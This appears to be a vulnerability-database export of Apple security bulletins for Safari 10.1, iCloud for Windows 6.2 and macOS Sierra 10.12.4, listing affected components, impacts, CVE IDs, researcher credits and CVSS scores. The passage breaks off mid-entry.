Apple\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: Multiple validation issues existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2364: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: A malicious website may exfiltrate data cross-origin\n\nDescription: A validation issue existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2367: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in the handling of frame objects. This issue was addressed with improved state management.\n\nCVE-2017-2445: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue existed in the handling of strict mode functions. This issue was addressed with improved state management.\n\nCVE-2017-2446: natashenka of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Visiting a maliciously crafted website may compromise user information\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2447: natashenka of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2471: Ivan Fratric of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in frame handling. This issue was addressed through improved state management.\n\nCVE-2017-2475: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2479: lokihardt of Google Project Zero\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2480: lokihardt of Google Project Zero\n\nCVE-2017-2493: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed through improved state management.\n\nCVE-2017-2486: an anonymous researcher\n\nEntry added March 30, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2392: Max Bazaliy of Lookout\n\nEntry added March 30, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2457: lokihardt of Google Project Zero\n\nEntry added March 30, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7071: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative \n\nEntry added August 23, 2017\n\n**WebKit JavaScript Bindings**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: Multiple validation issues existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2442: lokihardt of Google Project Zero\n\n**WebKit Web Inspector**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Closing a window while paused in the debugger may lead to unexpected application termination\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2377: Vicki Pfau\n\n**WebKit Web Inspector**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2405: Apple\n\n\n\n## Additional recognition\n\n**Safari**\n\nWe would like to acknowledge Flyin9 (ZhenHui Lee) for their assistance.\n\n**Webkit**\n\nWe would like to acknowledge Yosuke HASEGAWA of Secure Sky Technology Inc. for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: March 05, 2021\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-27T00:00:00", "type": "apple", "title": "About the security content of Safari 10.1", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9642", "CVE-2016-9643", "CVE-2017-2364", "CVE-2017-2367", "CVE-2017-2376", "CVE-2017-2377", "CVE-2017-2378", "CVE-2017-2385", "CVE-2017-2386", "CVE-2017-2389", "CVE-2017-2392", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2405", "CVE-2017-2415", "CVE-2017-2419", "CVE-2017-2424", "CVE-2017-2433", "CVE-2017-2442", "CVE-2017-2444", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2453", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2457", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2463", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2471", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2479", "CVE-2017-2480", "CVE-2017-2481", "CVE-2017-2486", "CVE-2017-2491", "CVE-2017-2492", "CVE-2017-2493", "CVE-2017-7071"], "modified": "2017-03-27T00:00:00", "id": "APPLE:581D1ADF40E75038A35B5C18CE7EDD03", "href": "https://support.apple.com/kb/HT207600", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-10T17:00:51", "description": "# About the security content of iCloud for Windows 6.2\n\nThis document describes the security content of iCloud for Windows 6.2.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iCloud for Windows 6.2\n\nReleased March 28, 2017\n\n**APNs Server**\n\nAvailable for: Windows 7 and later\n\nImpact: An attacker in a privileged network position can track a user's activity\n\nDescription: A client certificate was sent in plaintext. This issue was addressed through improved certificate handling.\n\nCVE-2017-2383: Matthias Wachs and Quirin Scheitle of Technical University Munich (TUM)\n\n**libxslt**\n\nAvailable for: Windows 7 and later\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2479: lokihardt of Google Project Zero\n\nCVE-2017-2480: lokihardt of Google Project Zero\n\nCVE-2017-2493: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: April 24, 2017\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-28T00:00:00", "type": "apple", "title": "About the security content of iCloud for Windows 6.2", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2383", "CVE-2017-2463", "CVE-2017-2479", "CVE-2017-2480", "CVE-2017-2493", "CVE-2017-5029"], "modified": "2017-03-28T00:00:00", "id": "APPLE:20D403FA17FFAFBF6C005DAD59ACB4F6", "href": "https://support.apple.com/kb/HT207607", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-24T20:42:27", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iCloud for Windows 6.2\n\nReleased March 28, 2017\n\n**APNs Server**\n\nAvailable for: Windows 7 and later\n\nImpact: An attacker in a privileged network position can track a user's activity\n\nDescription: A client certificate was sent in plaintext. This issue was addressed through improved certificate handling.\n\nCVE-2017-2383: Matthias Wachs and Quirin Scheitle of Technical University Munich (TUM)\n\n**libxslt**\n\nAvailable for: Windows 7 and later\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2479: lokihardt of Google Project Zero\n\nCVE-2017-2480: lokihardt of Google Project Zero\n\nCVE-2017-2493: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-04-24T06:47:37", "title": "About the security content of iCloud for Windows 6.2 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2479", "CVE-2017-2480", "CVE-2017-5029", "CVE-2017-2463", "CVE-2017-2493", "CVE-2017-2383"], "modified": "2017-04-24T06:47:37", "id": "APPLE:HT207607", "href": "https://support.apple.com/kb/HT207607", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-24T20:42:24", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## macOS Sierra 10.12.4, Security Update 2017-001 El Capitan, and Security Update 2017-001 Yosemite\n\nReleased March 27, 2017\n\n**apache**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: Multiple issues existed in Apache before 2.4.25. These were addressed by updating Apache to version 2.4.25.\n\nCVE-2016-0736\n\nCVE-2016-2161\n\nCVE-2016-5387\n\nCVE-2016-8740\n\nCVE-2016-8743\n\nEntry updated March 28, 2017\n\n**apache_mod_php**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Multiple issues existed in PHP before 5.6.30\n\nDescription: Multiple issues existed in PHP before 5.6.30. These were addressed by updating PHP to version 5.6.30.\n\nCVE-2016-10158\n\nCVE-2016-10159\n\nCVE-2016-10160\n\nCVE-2016-10161\n\nCVE-2016-9935\n\n**AppleGraphicsPowerManagement**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2421: @cocoahuke\n\n**AppleRAID**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2438: sss and Axis of 360Nirvanteam\n\n**Audio**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2430: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\nCVE-2017-2462: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\n**Bluetooth**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2420: Pekka Oikarainen, Matias Karhumaa and Marko Laakso of Synopsys Software Integrity Group\n\n**Bluetooth**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2427: Axis and sss of Qihoo 360 Nirvan Team\n\n**Bluetooth**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2449: sss and Axis from 360NirvanTeam\n\n**Carbon**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution\n\nDescription: A buffer overflow existed in the handling of font files. This issue was addressed through improved bounds checking.\n\nCVE-2017-2379: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department, John Villamil, Doyensec\n\n**CoreGraphics**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An infinite recursion was addressed through improved state management.\n\nCVE-2017-2417: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreMedia**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted .mov file may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the handling of .mov files. This issue was addressed through improved memory management.\n\nCVE-2017-2431: kimyok of Tencent Security Platform Department\n\n**CoreText**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2435: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2450: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed through improved input validation.\n\nCVE-2017-2461: Isaac Archambault of IDAoADI, an anonymous researcher\n\n**curl**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Maliciously crafted user input to libcurl API may allow arbitrary code execution\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2016-9586: Daniel Stenberg of Mozilla\n\n**EFI**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious Thunderbolt adapter may be able to recover the FileVault 2 encryption password\n\nDescription: An issue existed in the handling of DMA. This issue was addressed by enabling VT-d in EFI.\n\nCVE-2016-7585: Ulf Frisk (@UlfFrisk)\n\n**FinderKit**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Permissions may unexpectedly reset when sending links\n\nDescription: A permission issue existed in the handling of the Send Link feature of iCloud Sharing. This issue was addressed through improved permission controls.\n\nCVE-2017-2429: Raymond Wong DO of Arnot Ogden Medical Center\n\nEntry updated August 23, 2017\n\n**FontParser**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2487: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\nCVE-2017-2406: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Parsing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2407: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2439: John Villamil, Doyensec\n\n**FontParser**\n\nAvailable for: OS X El Capitan v10.11.6 and OS X Yosemite v10.10.5\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution \n\nDescription: A buffer overflow existed in the handling of font files. This issue was addressed through improved bounds checking.\n\nCVE-2016-4688: Simon Huang of Alipay company\n\nEntry added April 11, 2017\n\n**HTTPProtocol**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious HTTP/2 server may be able to cause undefined behavior\n\nDescription: Multiple issues existed in nghttp2 before 1.17.0. These were addressed by updating nghttp2 to version 1.17.0.\n\nCVE-2017-2428\n\nEntry updated March 28, 2017\n\n**Hypervisor**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Applications using the Hypervisor framework may unexpectedly leak the CR8 control register between guest and host\n\nDescription: An information leakage issue was addressed through improved state management.\n\nCVE-2017-2418: Alex Fishman and Izik Eidus of Veertu Inc.\n\n**iBooks**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Parsing a maliciously crafted iBooks file may lead to local file disclosure\n\nDescription: An information leak existed in the handling of file URLs. This issue was addressed through improved URL handling.\n\nCVE-2017-2426: Craig Arendt of Stratum Security, Jun Kokatsu (@shhnjk)\n\n**ImageIO**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2416: Qidan He (\u4f55\u6dc7\u4e39, @flanker_hqd) of KeenLab, Tencent\n\n**ImageIO**\n\nAvailable for: macOS Sierra 10.12.3, OS X El Capitan v10.11.6, and OS X Yosemite v10.10.5\n\nImpact: Viewing a maliciously crafted JPEG file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2432: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2467\n\n**ImageIO**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. This was addressed by updating LibTIFF in ImageIO to version 4.0.7.\n\nCVE-2016-3619\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges \n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2443: Ian Beer of Google Project Zero\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to disclose kernel memory\n\nDescription: A validation issue was addressed through improved input sanitization.\n\nCVE-2017-2489: Ian Beer of Google Project Zero\n\nEntry added March 31, 2017\n\n**IOATAFamily**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2408: Yangkang (@dnpushme) of Qihoo360 Qex Team\n\n**IOFireWireAVC**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2436: Orr A, IBM Security\n\n**IOFireWireAVC**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A local attacker may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2437: Benjamin Gnahm (@mitp0sh) of Blue Frost Security\n\n**IOFireWireFamily**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to cause a denial of service\n\nDescription: A null pointer dereference was addressed through improved input validation.\n\nCVE-2017-2388: Brandon Azad, an anonymous researcher\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2398: Lufeng Li of Qihoo 360 Vulcan Team\n\nCVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-2410: Apple\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-2440: an anonymous researcher\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with root privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2456: lokihardt of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2472: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2473: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An off-by-one issue was addressed through improved bounds checking.\n\nCVE-2017-2474: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved locking.\n\nCVE-2017-2478: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow issue was addressed through improved memory handling.\n\nCVE-2017-2482: Ian Beer of Google Project Zero\n\nCVE-2017-2483: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2490: Ian Beer of Google Project Zero, The UK's National Cyber Security Centre (NCSC)\n\nEntry added March 31, 2017\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: The screen may unexpectedly remain unlocked when the lid is closed\n\nDescription: An insufficient locking issue was addressed with improved state management.\n\nCVE-2017-7070: Ed McKenzie\n\nEntry added August 10, 2017\n\n**Keyboards**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2458: Shashank (@cyberboyIndia)\n\n**Keychain**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An attacker who is able to intercept TLS connections may be able to read secrets protected by iCloud Keychain.\n\nDescription: In certain circumstances, iCloud Keychain failed to validate the authenticity of OTR packets. This issue was addressed through improved validation.\n\nCVE-2017-2448: Alex Radocea of Longterm Security, Inc.\n\nEntry updated March 30, 2017\n\n**libarchive**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A local attacker may be able to change file system permissions on arbitrary directories\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed through improved validation of symlinks.\n\nCVE-2017-2390: Omer Medan of enSilo Ltd\n\n**libc++abi**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Demangling a malicious C++ application may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2441\n\n**LibreSSL**\n\nAvailable for: macOS Sierra 10.12.3 and OS X El Capitan v10.11.6\n\nImpact: A local user may be able to leak 